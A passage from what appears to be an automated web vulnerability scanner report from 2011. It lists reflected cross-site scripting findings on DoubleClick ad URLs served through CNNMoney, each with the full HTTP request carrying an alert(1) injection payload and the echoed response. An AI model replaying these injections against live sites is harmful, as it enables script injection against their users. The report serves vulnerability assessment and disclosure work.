User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Mar 2011 19:40:17 GMT
Vary: Accept-Encoding
Expires: Wed, 23 Mar 2011 19:40:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7456

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
"http://ad.doubleclick.net/click%3Bh%3Dv8/3ad3/f/1df/%2a/o%3B234200935%3B1-0%3B0%3B58104650%3B4307-300/250%3B38590136/38607893/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=35312197ce9"-alert(1)-"4b1d0a00e01&AdID=485242&TargetID=82896&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097
...[SNIP]...

1.15. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [Redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.CNNMoney.com/B5125476.2

Issue detail

The value of the Redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b62df"-alert(1)-"9086fda0f94 was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6036.CNNMoney.com/B5125476.2;sz=300x250;click=http://ads.cnn.com/event.ng/Type=click&FlightID=353121&AdID=485242&TargetID=82896&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=b62df"-alert(1)-"9086fda0f94 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage&params.styles=fs&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909177541&page.allowcompete=yes&domId=632100
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7415
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 23 Mar 2011 19:42:53 GMT
Expires: Wed, 23 Mar 2011 19:42:53 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=b62df"-alert(1)-"9086fda0f94http%3a%2f%2fwww.schwab.com/public/schwab/investment_products/etfs/schwab_etfs%3Fbmac%3Dpqw%26dsid%3Detfx");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
v
...[SNIP]...

1.16. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [Segments parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.CNNMoney.com/B5125476.2

Issue detail

The value of the Segments request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5be89"-alert(1)-"f533e927f7a was submitted in the Segments parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6036.CNNMoney.com/B5125476.2;sz=300x250;click=http://ads.cnn.com/event.ng/Type=click&FlightID=353121&AdID=485242&TargetID=82896&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,478055be89"-alert(1)-"f533e927f7a&Values=1589&Redirect=;ord=dhpofrv,bgyutdligxmWA? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage&params.styles=fs&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909177541&page.allowcompete=yes&domId=632100
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Mar 2011 19:42:05 GMT
Vary: Accept-Encoding
Expires: Wed, 23 Mar 2011 19:42:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7525

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
550,30220,31691,33074,33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,478055be89"-alert(1)-"f533e927f7a&Values=1589&Redirect=http%3a%2f%2fcontent.schwab.com/m/q410/swtr/swtr_dsgtld.html%3Fbmac%3Dprd%26dsid%3Dmult");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = ""
...[SNIP]...

1.17. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.CNNMoney.com/B5125476.2

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e04b9"-alert(1)-"f9561b8c9c2 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6036.CNNMoney.com/B5125476.2;sz=300x250;click=http://ads.cnn.com/event.ng/Type=click&FlightID=353121&AdID=485242&TargetID=82896e04b9"-alert(1)-"f9561b8c9c2&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=;ord=dhpofrv,bgyutdligxmWA? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage&params.styles=fs&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909177541&page.allowcompete=yes&domId=632100
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Mar 2011 19:41:30 GMT
Vary: Accept-Encoding
Expires: Wed, 23 Mar 2011 19:41:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7386

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
click%3Bh%3Dv8/3ad3/f/1df/%2a/o%3B234201805%3B0-0%3B0%3B58104650%3B4307-300/250%3B38588595/38606352/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=353121&AdID=485242&TargetID=82896e04b9"-alert(1)-"f9561b8c9c2&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097,33128,33526,33852,34172,38
...[SNIP]...

1.18. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [Values parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.CNNMoney.com/B5125476.2

Issue detail

The value of the Values request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52630"-alert(1)-"90c1f9dbbc4 was submitted in the Values parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6036.CNNMoney.com/B5125476.2;sz=300x250;click=http://ads.cnn.com/event.ng/Type=click&FlightID=353121&AdID=485242&TargetID=82896&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=158952630"-alert(1)-"90c1f9dbbc4&Redirect=;ord=dhpofrv,bgyutdligxmWA? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage&params.styles=fs&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909177541&page.allowcompete=yes&domId=632100
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Mar 2011 19:42:26 GMT
Vary: Accept-Encoding
Expires: Wed, 23 Mar 2011 19:42:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7433

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
691,33074,33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=158952630"-alert(1)-"90c1f9dbbc4&Redirect=http%3a%2f%2fwww.schwab.com/public/schwab/investment_products/etfs/etf_learning_center%3Fbmac%3Dpqv%26dsid%3Detfx");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque"
...[SNIP]...

1.19. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.CNNMoney.com/B5125476.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29d71"-alert(1)-"9f040ad00c0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6036.CNNMoney.com/B5125476.2;sz=300x250;click=http://ads.cnn.com/event.ng/Type=click29d71"-alert(1)-"9f040ad00c0&FlightID=353121&AdID=485242&TargetID=82896&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=;ord=dhpofrv,bgyutdligxmWA? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage&params.styles=fs&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909177541&page.allowcompete=yes&domId=632100
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Mar 2011 19:39:57 GMT
Vary: Accept-Encoding
Expires: Wed, 23 Mar 2011 19:39:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7525

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ar url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad3/f/1df/%2a/k%3B234201955%3B1-0%3B0%3B58104650%3B4307-300/250%3B38756194/38773951/3%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click29d71"-alert(1)-"9f040ad00c0&FlightID=353121&AdID=485242&TargetID=82896&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,3
...[SNIP]...

1.20. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [AdID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N815.cnnmoney/B5064924.32

Issue detail

The value of the AdID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c930d"-alert(1)-"c22f0226d15 was submitted in the AdID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N815.cnnmoney/B5064924.32;sz=728x90;click=http://ads.cnn.com/event.ng/Type=click&FlightID=362366&AdID=497675c930d"-alert(1)-"c22f0226d15&TargetID=112211&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423,38928,40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=;ord=cktNqWK,bgyutdWclbasd? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz&params.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Mar 2011 19:45:19 GMT
Expires: Wed, 23 Mar 2011 19:45:19 GMT
Vary: Accept-Encoding
Cache-Control: private, x-gzip-ok=""
Content-Length: 7619

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Mar 08 11:18:0
...[SNIP]...
doubleclick.net/click%3Bh%3Dv8/3ad3/f/1eb/%2a/i%3B233540379%3B4-0%3B0%3B57088445%3B3454-728/90%3B41064361/41082148/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=362366&AdID=497675c930d"-alert(1)-"c22f0226d15&TargetID=112211&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423,38928,40253
...[SNIP]...

1.21. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [FlightID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N815.cnnmoney/B5064924.32

Issue detail

The value of the FlightID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ed7e"-alert(1)-"f599974206b was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N815.cnnmoney/B5064924.32;sz=728x90;click=http://ads.cnn.com/event.ng/Type=click&FlightID=3623661ed7e"-alert(1)-"f599974206b&AdID=497675&TargetID=112211&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423,38928,40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=;ord=cktNqWK,bgyutdWclbasd? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz&params.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Mar 2011 19:44:41 GMT
Expires: Wed, 23 Mar 2011 19:44:41 GMT
Vary: Accept-Encoding
Cache-Control: private, x-gzip-ok=""
Content-Length: 7633

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Nov 30 09:29:38
...[SNIP]...
("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad3/f/1eb/%2a/t%3B233540379%3B0-0%3B0%3B57088445%3B3454-728/90%3B39656681/39674468/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=3623661ed7e"-alert(1)-"f599974206b&AdID=497675&TargetID=112211&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423
...[SNIP]...

1.22. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [Redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N815.cnnmoney/B5064924.32

Issue detail

The value of the Redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e1db"-alert(1)-"43d125b98c5 was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N815.cnnmoney/B5064924.32;sz=728x90;click=http://ads.cnn.com/event.ng/Type=click&FlightID=362366&AdID=497675&TargetID=112211&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423,38928,40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=2e1db"-alert(1)-"43d125b98c5 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz&params.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7714
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 23 Mar 2011 19:47:25 GMT
Expires: Wed, 23 Mar 2011 19:52:25 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Mar 08 09:18:11
...[SNIP]...
40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=2e1db"-alert(1)-"43d125b98c5http%3a%2f%2fwww.ibm.com/innovation/us/leadership/response/index.html%3Fcmp%3DUSBRB%26cm%3Db%26csr%3Dagus_itlead-20110307%26cr%3Dcnnmoney%26ct%3DUSBRB301%26cn%3Dcapleadmadrid");
var fscUrl = url;
var f
...[SNIP]...

1.23. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [Segments parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N815.cnnmoney/B5064924.32

Issue detail

The value of the Segments request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4304a"-alert(1)-"cda7ed7f77b was submitted in the Segments parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N815.cnnmoney/B5064924.32;sz=728x90;click=http://ads.cnn.com/event.ng/Type=click&FlightID=362366&AdID=497675&TargetID=112211&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423,38928,40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,478054304a"-alert(1)-"cda7ed7f77b&Values=1589&Redirect=;ord=cktNqWK,bgyutdWclbasd? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz&params.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Mar 2011 19:46:33 GMT
